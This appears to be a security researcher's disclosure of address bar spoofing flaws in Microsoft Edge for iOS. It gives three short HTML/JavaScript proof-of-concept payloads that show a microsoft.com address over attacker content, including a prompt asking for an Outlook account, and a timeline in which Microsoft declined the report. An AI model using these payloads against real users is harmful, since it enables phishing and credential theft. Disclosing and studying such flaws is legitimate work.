Microsoft Edge on iOS UI spoofing

Description

There were a dozen of address bar spoofing vulnerabilities in iOS edge browser which allow an attacker to trick a user into visiting a spoof website that appears to be legitimate.

1) Spoofing Case #1:

PoC:

1
2
3
4
5
<a href="https://www.microsoft.com:1234" download></a>
<script>
document.querySelector("a").click();
</script>
<h1><a href="javascript:prompt('Input your outlook account:')">click me</a></h1>

2) Spoofing Case #2:

PoC:

1
2
3
4
5
6
7
8
9
10
11
12
<script>
function pwn() {
v = setInterval(`x=window.open('https://www.microsoft.com:1234','test', 'width=400 height=300')`);
i = setInterval(`
x.document.write("<h1>url spoofing...</h1>");
x.window.prompt('dialog from');
clearInterval(v);
clearInterval(i);
`, 3333);
}
</script>
<li onclick="pwn()">click me</li>

3) Spoofing Case #3:

PoC:

1
2
3
4
5
<a href="https://www.microsoft.com:1234" download></a>
<script>
document.querySelector("a").click();
</script>
<h1><input type="file" name="file" onclick="javascript:alert('please upload file')"></h1>

Disclosure Timelines

2020/04/18 Provide vulnerability detail to Microsoft
2020/04/27 Microsoft said these vulnerabilities don’t meet the bar of service by MSRC.
2020/05/20 Disclosured